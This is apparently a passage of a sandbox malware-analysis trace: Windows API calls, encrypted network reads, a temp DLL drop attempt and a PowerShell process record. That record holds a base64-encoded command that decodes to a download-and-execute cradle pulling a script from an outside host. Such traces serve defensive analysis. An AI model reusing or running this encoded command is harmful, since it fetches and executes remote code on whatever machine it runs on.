	[0918.995] recv (in: s=0x4bc, buf=0x2f39323, len=16274, flags=0 | out: buf=0x2f39323*) returned 16274
	[0919.708] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f5fc50, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f5fc50, pfQOP=0x0) returned 0x0
	[0919.708] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0919.708] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 3017
	[0919.708] recv (in: s=0x4bc, buf=0x2f39e5e, len=13399, flags=0 | out: buf=0x2f39e5e*) returned 13399
	[0920.106] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f5fe90, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f5fe90, pfQOP=0x0) returned 0x0
	[0920.107] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0920.107] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 8572
	[0920.107] recv (in: s=0x4bc, buf=0x2f3b411, len=7844, flags=0 | out: buf=0x2f3b411*) returned 3472
	[0920.271] recv (in: s=0x4bc, buf=0x2f3c1a1, len=4372, flags=0 | out: buf=0x2f3c1a1*) returned 2960
	[0920.271] recv (in: s=0x4bc, buf=0x2f3cd31, len=1412, flags=0 | out: buf=0x2f3cd31*) returned 1412
	[0920.274] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f600f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f600f8, pfQOP=0x0) returned 0x0
	[0920.275] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0920.275] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 5551
	[0920.275] recv (in: s=0x4bc, buf=0x2f3a844, len=10865, flags=0 | out: buf=0x2f3a844*) returned 10865
	[0920.372] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f60338, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f60338, pfQOP=0x0) returned 0x0
	[0920.375] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0920.375] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 4138
	[0920.375] recv (in: s=0x4bc, buf=0x2f3a2bf, len=12278, flags=0 | out: buf=0x2f3a2bf*) returned 4288
	[0920.725] recv (in: s=0x4bc, buf=0x2f3b37f, len=7990, flags=0 | out: buf=0x2f3b37f*) returned 6432
	[0920.725] recv (in: s=0x4bc, buf=0x2f3cc9f, len=1558, flags=0 | out: buf=0x2f3cc9f*) returned 1558
	[0921.007] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f605c8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f605c8, pfQOP=0x0) returned 0x0
	[0921.007] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0921.007] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 45
	[0921.008] recv (in: s=0x4bc, buf=0x2f392c2, len=16371, flags=0 | out: buf=0x2f392c2*) returned 16371
	[0921.829] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f60808, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f60808, pfQOP=0x0) returned 0x0
	[0921.834] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0921.835] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 16416
	[0921.835] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f60a70, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f60a70, pfQOP=0x0) returned 0x0
	[0921.835] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0921.835] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 10083
	[0921.836] recv (in: s=0x4bc, buf=0x2f3b9f8, len=6333, flags=0 | out: buf=0x2f3b9f8*) returned 6333
	[0923.178] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f60cb0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f60cb0, pfQOP=0x0) returned 0x0
	[0923.184] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0923.184] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 16416
	[0923.184] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f60ef0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f60ef0, pfQOP=0x0) returned 0x0
	[0923.188] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0923.188] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 1361
	[0923.188] recv (in: s=0x4bc, buf=0x2f397e6, len=15055, flags=0 | out: buf=0x2f397e6*) returned 15055
	[0923.443] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f61130, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f61130, pfQOP=0x0) returned 0x0
	[0923.443] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0923.444] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 1556
	[0923.444] recv (in: s=0x4bc, buf=0x2f398a9, len=14860, flags=0 | out: buf=0x2f398a9*) returned 14860
	[0923.623] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f61398, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f61398, pfQOP=0x0) returned 0x0
	[0923.624] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0923.624] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 2823
	[0923.624] recv (in: s=0x4bc, buf=0x2f39d9c, len=13593, flags=0 | out: buf=0x2f39d9c*) returned 13593
	[0924.439] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f615d8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f615d8, pfQOP=0x0) returned 0x0
	[0924.440] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0924.440] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 16416
	[0924.440] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f61818, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f61818, pfQOP=0x0) returned 0x0
	[0924.441] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0924.441] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 16416
	[0924.441] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f61a58, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f61a58, pfQOP=0x0) returned 0x0
	[0924.442] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0924.442] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 192
	[0924.442] recv (in: s=0x4bc, buf=0x2f39355, len=16224, flags=0 | out: buf=0x2f39355*) returned 16224
	[0924.617] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f61cc0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f61cc0, pfQOP=0x0) returned 0x0
	[0924.618] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0924.618] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 387
	[0924.618] recv (in: s=0x4bc, buf=0x2f39418, len=16029, flags=0 | out: buf=0x2f39418*) returned 16029
	[0924.772] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f61f00, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f61f00, pfQOP=0x0) returned 0x0
	[0924.773] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0924.773] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 1118
	[0924.773] recv (in: s=0x4bc, buf=0x2f396f3, len=15298, flags=0 | out: buf=0x2f396f3*) returned 15298
	[0924.959] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f62140, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f62140, pfQOP=0x0) returned 0x0
	[0924.959] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0924.959] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 2921
	[0924.959] recv (in: s=0x4bc, buf=0x2f39dfe, len=13495, flags=0 | out: buf=0x2f39dfe*) returned 13495
	[0925.249] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f62380, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f62380, pfQOP=0x0) returned 0x0
	[0925.250] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0925.250] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 436
	[0925.250] recv (in: s=0x4bc, buf=0x2f39449, len=15980, flags=0 | out: buf=0x2f39449*) returned 15980
	[0925.428] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f625e8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f625e8, pfQOP=0x0) returned 0x0
	[0925.430] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0925.430] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 1167
	[0925.430] recv (in: s=0x4bc, buf=0x2f39724, len=15249, flags=0 | out: buf=0x2f39724*) returned 2144
	[0925.430] recv (in: s=0x4bc, buf=0x2f39f84, len=13105, flags=0 | out: buf=0x2f39f84*) returned 13105
	[0925.606] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f62828, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f62828, pfQOP=0x0) returned 0x0
	[0925.608] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0925.608] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 6186
	[0925.609] recv (in: s=0x4bc, buf=0x2f3aabf, len=10230, flags=0 | out: buf=0x2f3aabf*) returned 10230
	[0925.700] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f62a90, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f62a90, pfQOP=0x0) returned 0x0
	[0925.701] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0925.701] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 485
	[0925.701] recv (in: s=0x4bc, buf=0x2f3947a, len=15931, flags=0 | out: buf=0x2f3947a*) returned 15931
	[0925.881] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f62cd0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f62cd0, pfQOP=0x0) returned 0x0
	[0925.882] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0925.882] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 144
	[0925.882] recv (in: s=0x4bc, buf=0x2f39325, len=16272, flags=0 | out: buf=0x2f39325*) returned 16272
	[0926.049] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f62f38, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f62f38, pfQOP=0x0) returned 0x0
	[0926.050] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0926.050] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 3019
	[0926.130] recv (in: s=0x4bc, buf=0x2f39e60, len=13397, flags=0 | out: buf=0x2f39e60*) returned 8576
	[0926.131] recv (in: s=0x4bc, buf=0x2f3bfe0, len=4821, flags=0 | out: buf=0x2f3bfe0*) returned 4821
	[0926.142] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f63178, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f63178, pfQOP=0x0) returned 0x0
	[0926.144] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0926.144] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 3750
	[0926.144] recv (in: s=0x4bc, buf=0x2f3a13b, len=12666, flags=0 | out: buf=0x2f3a13b*) returned 12666
	[0926.236] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f633b8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f633b8, pfQOP=0x0) returned 0x0
	[0926.237] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0926.237] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 1265
	[0926.237] recv (in: s=0x4bc, buf=0x2f39786, len=15151, flags=0 | out: buf=0x2f39786*) returned 15151
	[0926.398] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f635f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f635f8, pfQOP=0x0) returned 0x0
	[0926.399] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0926.399] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 924
	[0926.399] recv (in: s=0x4bc, buf=0x2f39631, len=15492, flags=0 | out: buf=0x2f39631*) returned 15492
	[0926.534] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f63860, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f63860, pfQOP=0x0) returned 0x0
	[0926.535] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0926.535] recv (in: s=0x4bc, buf=0x2f39295, len=16416, flags=0 | out: buf=0x2f39295*) returned 3799
	[0926.535] recv (in: s=0x4bc, buf=0x2f3a16c, len=12617, flags=0 | out: buf=0x2f3a16c*) returned 12617
	[0926.589] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f63aa0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f63aa0, pfQOP=0x0) returned 0x0
	[0926.590] recv (in: s=0x4bc, buf=0x2f39290, len=5, flags=0 | out: buf=0x2f39290*) returned 5
	[0926.590] recv (in: s=0x4bc, buf=0x2f39295, len=4752, flags=0 | out: buf=0x2f39295*) returned 242
	[0926.590] recv (in: s=0x4bc, buf=0x2f39387, len=4510, flags=0 | out: buf=0x2f39387*) returned 4510
	[0927.042] DecryptMessage (in: phContext=0x1c89d8a0, pMessage=0x2f63cb8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2f63cb8, pfQOP=0x0) returned 0x0
	[0927.046] SetEvent (hEvent=0x35c) returned 1
	[0936.065] CoTaskMemAlloc (cb=0x104) returned 0x1b93d010
	[0936.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93d010, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0936.065] CoTaskMemFree (pv=0x1b93d010) 
	[0936.145] CoTaskMemAlloc (cb=0x104) returned 0x1b93d010
	[0936.145] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1b93d010, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0936.145] CoTaskMemFree (pv=0x1b93d010) 
	[0936.148] CoTaskMemAlloc (cb=0x104) returned 0x1b93d010
	[0936.148] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1b93d010, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0936.148] CoTaskMemFree (pv=0x1b93d010) 
	[0939.391] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5P5NRG~1\\", lpszLongPath=0x1c89d570, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 0x1e
	[0939.392] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", nBufferLength=0x105, lpBuffer=0x1c89d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", lpFilePart=0x0) returned 0x3f
	[0939.392] SetErrorMode (uMode=0x1) returned 0x1
	[0939.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vthqexnegi.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffffffffffff
	[0954.612] SetErrorMode (uMode=0x1) returned 0x1
	[0954.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c89af00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c89ae50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c89ae50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c89ae50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0955.640] CoTaskMemAlloc (cb=0x104) returned 0x1b93d010
	[0955.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93d010, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0955.640] CoTaskMemFree (pv=0x1b93d010) 

Thread:
	id = 1997
	os_tid = 0x2720


Thread:
	id = 1999
	os_tid = 0x2728


Thread:
	id = 2002
	os_tid = 0x2738


Thread:
	id = 2003
	os_tid = 0x273c

	[0901.328] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0901.332] ResetEvent (hEvent=0x35c) returned 1

Thread:
	id = 2043
	os_tid = 0x27dc


Process:
	id = "61"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x25e07000"
	os_pid = "0xf38"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "9"
	os_parent_pid = "0xc8"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 311
	os_tid = 0xf3c

	[0437.323] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0438.577] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0438.577] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0438.578] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0438.578] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0441.557] GetVersionExW (in: lpVersionInformation=0x22e040*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22e040*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0441.559] GetVersionExW (in: lpVersionInformation=0x22e040*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22e040*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0441.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0441.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0441.572] GetVersionExW (in: lpVersionInformation=0x22ddb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22ddb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0441.573] SetErrorMode (uMode=0x1) returned 0x1
	[0441.574] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x22df10 | out: lpFileInformation=0x22df10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0441.575] SetErrorMode (uMode=0x1) returned 0x1
	[0441.579] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x22e180 | out: lpdwHandle=0x22e180) returned 0x94c
	[0442.233] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ae72a0 | out: lpData=0x2ae72a0) returned 1
	[0442.237] VerQueryValueW (in: pBlock=0x2ae72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22e0f8, puLen=0x22e0f0 | out: lplpBuffer=0x22e0f8*=0x2ae733c, puLen=0x22e0f0) returned 1
	[0442.243] lstrlenW (lpString="䅁") returned 1
	[0442.253] VerQueryValueW (in: pBlock=0x2ae72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2ae7418, puLen=0x22e060) returned 1
	[0442.254] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0442.256] CoTaskMemAlloc (cb=0x2e) returned 0x4290c0
	[0442.256] lstrcpyW (in: lpString1=0x4290c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0442.257] CoTaskMemFree (pv=0x4290c0) 
	[0442.257] VerQueryValueW (in: pBlock=0x2ae72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2ae746c, puLen=0x22e060) returned 1
	[0442.257] lstrlenW (lpString="System.Management.Automation") returned 28
	[0442.257] CoTaskMemAlloc (cb=0x3c) returned 0x359e80
	[0442.257] lstrcpyW (in: lpString1=0x359e80, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0442.257] CoTaskMemFree (pv=0x359e80) 
	[0442.257] VerQueryValueW (in: pBlock=0x2ae72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2ae74c8, puLen=0x22e060) returned 1
	[0442.257] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0442.257] CoTaskMemAlloc (cb=0x20) returned 0x4295a0
	[0442.257] lstrcpyW (in: lpString1=0x4295a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0442.257] CoTaskMemFree (pv=0x4295a0) 
	[0442.257] VerQueryValueW (in: pBlock=0x2ae72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x22e068, puLen=0x22e060 | out: lplpBuffer=0x22e068*=0x2ae7508, puLen=0x22e060) returned 1
	[0442.258] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0442.258] CoTaskMemAlloc (cb=0x44) returned 0x359e80
	[0442.258] lstrcpyW (in: lpString1=0x359e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0442.258] CoTaskMemFree (pv=0x359e80) 
